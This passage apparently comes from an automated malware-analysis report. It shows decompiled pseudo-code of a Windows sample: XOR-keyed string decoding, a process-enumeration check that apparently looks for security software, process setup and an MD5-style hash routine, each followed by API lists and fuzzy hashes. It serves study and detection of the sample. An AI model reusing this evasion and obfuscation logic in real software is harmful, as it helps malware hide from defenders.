                                                                                                                                  								_t53 = E022B9403(_t104, _t103, _t65 ^ 0x3df17130);
                                                                                                                                  							}
                                                                                                                                  							if(_t53 == 0) {
                                                                                                                                  								L59:
                                                                                                                                  								_t54 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  								_t22 = _t54 + 0x22be252; // 0x616d692f
                                                                                                                                  								 *0x22bd2d4 = _t22;
                                                                                                                                  								goto L60;
                                                                                                                                  							} else {
                                                                                                                                  								_t64 = E022BA0FD(0, _t53);
                                                                                                                                  								 *0x22bd2d4 = _t64;
                                                                                                                                  								if(_t64 != 0) {
                                                                                                                                  									L60:
                                                                                                                                  									if(_t103 == 0) {
                                                                                                                                  										_t56 = 0;
                                                                                                                                  									} else {
                                                                                                                                  										_t61 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  										_t56 = E022B9403(_t104, _t103, _t61 ^ 0xd2079859);
                                                                                                                                  									}
                                                                                                                                  									if(_t56 == 0) {
                                                                                                                                  										_t57 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  										_t23 = _t57 + 0x22be791; // 0x6976612e
                                                                                                                                  										_t58 = _t23;
                                                                                                                                  									} else {
                                                                                                                                  										_t58 = E022BA0FD(0, _t56);
                                                                                                                                  									}
                                                                                                                                  									 *0x22bd340 = _t58;
                                                                                                                                  									HeapFree( *0x22bd238, 0, _t103);
                                                                                                                                  									_v12 = 0;
                                                                                                                                  									goto L67;
                                                                                                                                  								}
                                                                                                                                  								goto L59;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}






































                                                                                                                                  0x022b821d
                                                                                                                                  0x022b8233
                                                                                                                                  0x022b821f
                                                                                                                                  0x022b821f
                                                                                                                                  0x022b822c
                                                                                                                                  0x022b822c
                                                                                                                                  0x022b8237
                                                                                                                                  0x022b8243
                                                                                                                                  0x022b8248
                                                                                                                                  0x022b8248
                                                                                                                                  0x022b8239
                                                                                                                                  0x022b823c
                                                                                                                                  0x022b823c
                                                                                                                                  0x022b8256
                                                                                                                                  0x022b825b
                                                                                                                                  0x022b8261
                                                                                                                                  0x00000000
                                                                                                                                  0x022b8261
                                                                                                                                  0x00000000
                                                                                                                                  0x022b8209
                                                                                                                                  0x022b81f8
                                                                                                                                  0x022b8161
                                                                                                                                  0x022b8155

                                                                                                                                  APIs
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B8063
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B8095
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B80C7
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B80F9
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B812B
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008), ref: 022B815D
                                                                                                                                  • HeapFree.KERNEL32(00000000,022B30F3,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008,?,022B30F3), ref: 022B825B
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005,022BD00C,00000008,?,022B30F3), ref: 022B826E
                                                                                                                                    • Part of subcall function 022BA0FD: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,022B30F3,022B8241,00000000,022B30F3,?,69B25F44,?,022B30F3,69B25F44,?,022B30F3,69B25F44,00000005), ref: 022BA106
                                                                                                                                    • Part of subcall function 022BA0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,022B30F3), ref: 022BA129
                                                                                                                                    • Part of subcall function 022BA0FD: memset.NTDLL ref: 022BA138
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3442150357-8415677
                                                                                                                                  • Opcode ID: fa83d14361f5f4f7ba291b108407451d4ef1ef4c540544f41d1e26452de262d5
                                                                                                                                  • Instruction ID: b4fc6166b625a698bbefb1cbd94b7c76159ae8a4646cf9fa2043a2701eb50832
                                                                                                                                  • Opcode Fuzzy Hash: fa83d14361f5f4f7ba291b108407451d4ef1ef4c540544f41d1e26452de262d5
                                                                                                                                  • Instruction Fuzzy Hash: 5C818174E30246AFCB13EBF4DD889EB76ADDF483807280D25E509D7119EBB5D9418B22
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E022B8F1B() {
                                                                                                                                  				char _v264;
                                                                                                                                  				void* _v300;
                                                                                                                                  				int _t8;
                                                                                                                                  				intOrPtr _t9;
                                                                                                                                  				int _t15;
                                                                                                                                  				void* _t17;
                                                                                                                                  
                                                                                                                                  				_t15 = 0;
                                                                                                                                  				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                  				if(_t17 != 0) {
                                                                                                                                  					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                  					while(_t8 != 0) {
                                                                                                                                  						_t9 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  						_t2 = _t9 + 0x22bee34; // 0x73617661
                                                                                                                                  						_push( &_v264);
                                                                                                                                  						if( *0x22bd0fc() != 0) {
                                                                                                                                  							_t15 = 1;
                                                                                                                                  						} else {
                                                                                                                                  							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						L7:
                                                                                                                                  						CloseHandle(_t17);
                                                                                                                                  						goto L8;
                                                                                                                                  					}
                                                                                                                                  					goto L7;
                                                                                                                                  				}
                                                                                                                                  				L8:
                                                                                                                                  				return _t15;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022B8F2B
                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 022B8F3E
                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 022B8F6A
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 022B8F79
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                  • Opcode ID: 3187485b2835e4e9e154279955b671efa32523b990fa22b717fe148f5e774e33
                                                                                                                                  • Instruction ID: 69053d0e70cc7cd89f62d6d7320f05d3c5fe674491e723aabc1b0e0d2004c563
                                                                                                                                  • Opcode Fuzzy Hash: 3187485b2835e4e9e154279955b671efa32523b990fa22b717fe148f5e774e33
                                                                                                                                  • Instruction Fuzzy Hash: 94F02B355211246BE723B6E69C0CEEBB26EDFC5390F400161E919C3008EF20CA45CAB2
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00401752() {
                                                                                                                                  				void* _t1;
                                                                                                                                  				unsigned int _t3;
                                                                                                                                  				void* _t4;
                                                                                                                                  				long _t5;
                                                                                                                                  				void* _t6;
                                                                                                                                  				intOrPtr _t10;
                                                                                                                                  				void* _t14;
                                                                                                                                  
                                                                                                                                  				_t10 =  *0x4030f0;
                                                                                                                                  				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                  				 *0x4030fc = _t1;
                                                                                                                                  				if(_t1 == 0) {
                                                                                                                                  					return GetLastError();
                                                                                                                                  				}
                                                                                                                                  				_t3 = GetVersion();
                                                                                                                                  				if(_t3 != 5) {
                                                                                                                                  					L4:
                                                                                                                                  					if(_t14 <= 0) {
                                                                                                                                  						_t4 = 0x32;
                                                                                                                                  						return _t4;
                                                                                                                                  					} else {
                                                                                                                                  						goto L5;
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					if(_t3 >> 8 > 0) {
                                                                                                                                  						L5:
                                                                                                                                  						 *0x4030ec = _t3;
                                                                                                                                  						_t5 = GetCurrentProcessId();
                                                                                                                                  						 *0x4030e8 = _t5;
                                                                                                                                  						 *0x4030f0 = _t10;
                                                                                                                                  						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                  						 *0x4030e4 = _t6;
                                                                                                                                  						if(_t6 == 0) {
                                                                                                                                  							 *0x4030e4 =  *0x4030e4 | 0xffffffff;
                                                                                                                                  						}
                                                                                                                                  						return 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t14 = _t3 - _t3;
                                                                                                                                  						goto L4;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}











                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019AC), ref: 00401761
                                                                                                                                  • GetVersion.KERNEL32 ref: 00401770
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0040178C
                                                                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004017A5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 845504543-0
                                                                                                                                  • Opcode ID: 239b346ddb4e1af03e74690df84409a47080255b9289a2f171059d4aa852614c
                                                                                                                                  • Instruction ID: de110183062e86dcac6d67db381f44f5737484f963d514ed7bd2dcac5e25d41b
                                                                                                                                  • Opcode Fuzzy Hash: 239b346ddb4e1af03e74690df84409a47080255b9289a2f171059d4aa852614c
                                                                                                                                  • Instruction Fuzzy Hash: BDF01D306813129BE6119F647F19B953B69A705712F108136FA02F62E4E7B58541CB5C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 49%
                                                                                                                                  			E022B836E(void* __ecx, intOrPtr* _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				intOrPtr _v44;
                                                                                                                                  				intOrPtr _v48;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				intOrPtr _v56;
                                                                                                                                  				intOrPtr _v60;
                                                                                                                                  				intOrPtr _v64;
                                                                                                                                  				intOrPtr _v68;
                                                                                                                                  				intOrPtr _v72;
                                                                                                                                  				void _v76;
                                                                                                                                  				intOrPtr* _t226;
                                                                                                                                  				signed int _t229;
                                                                                                                                  				signed int _t231;
                                                                                                                                  				signed int _t233;
                                                                                                                                  				signed int _t235;
                                                                                                                                  				signed int _t237;
                                                                                                                                  				signed int _t239;
                                                                                                                                  				signed int _t241;
                                                                                                                                  				signed int _t243;
                                                                                                                                  				signed int _t245;
                                                                                                                                  				signed int _t247;
                                                                                                                                  				signed int _t249;
                                                                                                                                  				signed int _t251;
                                                                                                                                  				signed int _t253;
                                                                                                                                  				signed int _t255;
                                                                                                                                  				signed int _t257;
                                                                                                                                  				signed int _t259;
                                                                                                                                  				signed int _t338;
                                                                                                                                  				signed char* _t348;
                                                                                                                                  				signed int _t349;
                                                                                                                                  				signed int _t351;
                                                                                                                                  				signed int _t353;
                                                                                                                                  				signed int _t355;
                                                                                                                                  				signed int _t357;
                                                                                                                                  				signed int _t359;
                                                                                                                                  				signed int _t361;
                                                                                                                                  				signed int _t363;
                                                                                                                                  				signed int _t365;
                                                                                                                                  				signed int _t367;
                                                                                                                                  				signed int _t376;
                                                                                                                                  				signed int _t378;
                                                                                                                                  				signed int _t380;
                                                                                                                                  				signed int _t382;
                                                                                                                                  				signed int _t384;
                                                                                                                                  				intOrPtr* _t400;
                                                                                                                                  				signed int* _t401;
                                                                                                                                  				signed int _t402;
                                                                                                                                  				signed int _t404;
                                                                                                                                  				signed int _t406;
                                                                                                                                  				signed int _t408;
                                                                                                                                  				signed int _t410;
                                                                                                                                  				signed int _t412;
                                                                                                                                  				signed int _t414;
                                                                                                                                  				signed int _t416;
                                                                                                                                  				signed int _t418;
                                                                                                                                  				signed int _t420;
                                                                                                                                  				signed int _t422;
                                                                                                                                  				signed int _t424;
                                                                                                                                  				signed int _t432;
                                                                                                                                  				signed int _t434;
                                                                                                                                  				signed int _t436;
                                                                                                                                  				signed int _t438;
                                                                                                                                  				signed int _t440;
                                                                                                                                  				signed int _t508;
                                                                                                                                  				signed int _t599;
                                                                                                                                  				signed int _t607;
                                                                                                                                  				signed int _t613;
                                                                                                                                  				signed int _t679;
                                                                                                                                  				void* _t682;
                                                                                                                                  				signed int _t683;
                                                                                                                                  				signed int _t685;
                                                                                                                                  				signed int _t690;
                                                                                                                                  				signed int _t692;
                                                                                                                                  				signed int _t697;
                                                                                                                                  				signed int _t699;
                                                                                                                                  				signed int _t718;
                                                                                                                                  				signed int _t720;
                                                                                                                                  				signed int _t722;
                                                                                                                                  				signed int _t724;
                                                                                                                                  				signed int _t726;
                                                                                                                                  				signed int _t728;
                                                                                                                                  				signed int _t734;
                                                                                                                                  				signed int _t740;
                                                                                                                                  				signed int _t742;
                                                                                                                                  				signed int _t744;
                                                                                                                                  				signed int _t746;
                                                                                                                                  				signed int _t748;
                                                                                                                                  
                                                                                                                                  				_t226 = _a4;
                                                                                                                                  				_t348 = __ecx + 2;
                                                                                                                                  				_t401 =  &_v76;
                                                                                                                                  				_t682 = 0x10;
                                                                                                                                  				do {
                                                                                                                                  					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                                                                                                                  					_t401 =  &(_t401[1]);
                                                                                                                                  					_t348 =  &(_t348[4]);
                                                                                                                                  					_t682 = _t682 - 1;
                                                                                                                                  				} while (_t682 != 0);
                                                                                                                                  				_t6 = _t226 + 4; // 0x14eb3fc3
                                                                                                                                  				_t683 =  *_t6;
                                                                                                                                  				_t7 = _t226 + 8; // 0x8d08458b
                                                                                                                                  				_t402 =  *_t7;
                                                                                                                                  				_t8 = _t226 + 0xc; // 0x56c1184c
                                                                                                                                  				_t349 =  *_t8;
                                                                                                                                  				asm("rol eax, 0x7");
                                                                                                                                  				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                                                                                                                  				asm("rol ecx, 0xc");
                                                                                                                                  				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                                                                                                                  				asm("ror edx, 0xf");
                                                                                                                                  				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                                                                                                                  				asm("ror esi, 0xa");
                                                                                                                                  				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                                                                                                                  				_v8 = _t685;
                                                                                                                                  				_t690 = _v8;
                                                                                                                                  				asm("rol eax, 0x7");
                                                                                                                                  				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                                                                                                                  				asm("rol ecx, 0xc");
                                                                                                                                  				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                                                                                                                  				asm("ror edx, 0xf");
                                                                                                                                  				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                                                                                                                  				asm("ror esi, 0xa");
                                                                                                                                  				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                                                                                                                  				_v8 = _t692;
                                                                                                                                  				_t697 = _v8;
                                                                                                                                  				asm("rol eax, 0x7");
                                                                                                                                  				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                                                                                                                  				asm("rol ecx, 0xc");
                                                                                                                                  				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                                                                                                                  				asm("ror edx, 0xf");
                                                                                                                                  				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                                                                                                                  				asm("ror esi, 0xa");
                                                                                                                                  				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                                                                                                                  				_v8 = _t699;
                                                                                                                                  				asm("rol eax, 0x7");
                                                                                                                                  				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                                                                                                  				asm("rol ecx, 0xc");
                                                                                                                                  				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                                                                                                                  				_t508 =  !_t357;
                                                                                                                                  				asm("ror edx, 0xf");
                                                                                                                                  				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                                                                                                                  				_v12 = _t410;
                                                                                                                                  				_v12 =  !_v12;
                                                                                                                                  				asm("ror esi, 0xa");
                                                                                                                                  				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                                                                                                                  				asm("rol eax, 0x5");
                                                                                                                                  				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                                                                                                                  				asm("rol ecx, 0x9");
                                                                                                                                  				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                                                                                                                  				asm("rol edx, 0xe");
                                                                                                                                  				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                                                                                                                  				asm("ror esi, 0xc");
                                                                                                                                  				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                                                                                                                  				asm("rol eax, 0x5");
                                                                                                                                  				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                                                                                                                  				asm("rol ecx, 0x9");
                                                                                                                                  				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                                                                                                                  				asm("rol edx, 0xe");
                                                                                                                                  				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                                                                                                                  				asm("ror esi, 0xc");
                                                                                                                                  				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                                                                                                                  				asm("rol eax, 0x5");
                                                                                                                                  				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                                                                                                                  				asm("rol ecx, 0x9");
                                                                                                                                  				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                                                                                                                  				asm("rol edx, 0xe");
                                                                                                                                  				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                                                                                                                  				asm("ror esi, 0xc");
                                                                                                                                  				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                                                                                                                  				asm("rol eax, 0x5");
                                                                                                                                  				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                                                                                                                  				asm("rol ecx, 0x9");
                                                                                                                                  				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                                                                                                                  				asm("rol edx, 0xe");
                                                                                                                                  				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                                                                                                                  				asm("ror esi, 0xc");
                                                                                                                                  				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                                                                                                                  				asm("rol eax, 0x4");
                                                                                                                                  				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                                                                                                                  				asm("rol ecx, 0xb");
                                                                                                                                  				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                                                                                                                  				asm("rol edx, 0x10");
                                                                                                                                  				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                                                                                                                  				_t599 = _t367 ^ _t420;
                                                                                                                                  				asm("ror esi, 0x9");
                                                                                                                                  				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                                                                                                                  				asm("rol eax, 0x4");
                                                                                                                                  				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                                                                                                                  				asm("rol edi, 0xb");
                                                                                                                                  				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                                                                                                                  				asm("rol edx, 0x10");
                                                                                                                                  				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                                                                                                                  				_t338 = _t607 ^ _t422;
                                                                                                                                  				asm("ror ecx, 0x9");
                                                                                                                                  				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                                                                                                                  				asm("rol eax, 0x4");
                                                                                                                                  				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                                                                                                                  				asm("rol esi, 0xb");
                                                                                                                                  				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                                                                                                                  				asm("rol edi, 0x10");
                                                                                                                                  				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                                                                                                                  				_t424 = _t734 ^ _t613;
                                                                                                                                  				asm("ror ecx, 0x9");
                                                                                                                                  				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                                                                                                                  				asm("rol eax, 0x4");
                                                                                                                                  				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                                                                                                                  				asm("rol edx, 0xb");
                                                                                                                                  				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                                                                                                                  				asm("rol esi, 0x10");
                                                                                                                                  				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                                                                                                                  				asm("ror ecx, 0x9");
                                                                                                                                  				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                                                                                                                  				asm("rol eax, 0x6");
                                                                                                                                  				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                                                                                                                  				asm("rol edx, 0xa");
                                                                                                                                  				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                                                                                                                  				asm("rol esi, 0xf");
                                                                                                                                  				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                                                                                                                  				asm("ror ecx, 0xb");
                                                                                                                                  				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                                                                                                                  				asm("rol eax, 0x6");
                                                                                                                                  				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                                                                                                                  				asm("rol edx, 0xa");
                                                                                                                                  				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                                                                                                                  				asm("rol esi, 0xf");
                                                                                                                                  				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                                                                                                                  				asm("ror ecx, 0xb");
                                                                                                                                  				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                                                                                                                  				asm("rol eax, 0x6");
                                                                                                                                  				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                                                                                                                  				asm("rol edx, 0xa");
                                                                                                                                  				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                                                                                                                  				asm("rol esi, 0xf");
                                                                                                                                  				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                                                                                                                  				asm("ror edi, 0xb");
                                                                                                                                  				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                                                                                                                  				asm("rol eax, 0x6");
                                                                                                                                  				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                                                                                                                  				asm("rol edx, 0xa");
                                                                                                                                  				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                                                                                                                  				_t400 = _a4;
                                                                                                                                  				asm("rol esi, 0xf");
                                                                                                                                  				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                                                                                                                  				 *_t400 =  *_t400 + _t259;
                                                                                                                                  				asm("ror eax, 0xb");
                                                                                                                                  				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                                                                                                                  				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                                                                                                                  				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                                                                                                                  				return memset( &_v76, 0, 0x40);
                                                                                                                                  			}

                                                                                                                                  0x022b8849
                                                                                                                                  0x022b885b
                                                                                                                                  0x022b885e
                                                                                                                                  0x022b8870
                                                                                                                                  0x022b8873
                                                                                                                                  0x022b8887
                                                                                                                                  0x022b888a
                                                                                                                                  0x022b889e
                                                                                                                                  0x022b88a1
                                                                                                                                  0x022b88b5
                                                                                                                                  0x022b88b8
                                                                                                                                  0x022b88cc
                                                                                                                                  0x022b88cf
                                                                                                                                  0x022b88e3
                                                                                                                                  0x022b88e6
                                                                                                                                  0x022b88fa
                                                                                                                                  0x022b88ff
                                                                                                                                  0x022b8911
                                                                                                                                  0x022b8914
                                                                                                                                  0x022b8928
                                                                                                                                  0x022b892b
                                                                                                                                  0x022b893f
                                                                                                                                  0x022b8942
                                                                                                                                  0x022b8958
                                                                                                                                  0x022b895b
                                                                                                                                  0x022b896f
                                                                                                                                  0x022b8972
                                                                                                                                  0x022b8984
                                                                                                                                  0x022b8987
                                                                                                                                  0x022b899b
                                                                                                                                  0x022b899e
                                                                                                                                  0x022b89b2
                                                                                                                                  0x022b89b5
                                                                                                                                  0x022b89c9
                                                                                                                                  0x022b89d2
                                                                                                                                  0x022b89d5
                                                                                                                                  0x022b89de
                                                                                                                                  0x022b89e7
                                                                                                                                  0x022b89ef
                                                                                                                                  0x022b89f7
                                                                                                                                  0x022b8a01
                                                                                                                                  0x022b8a16

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
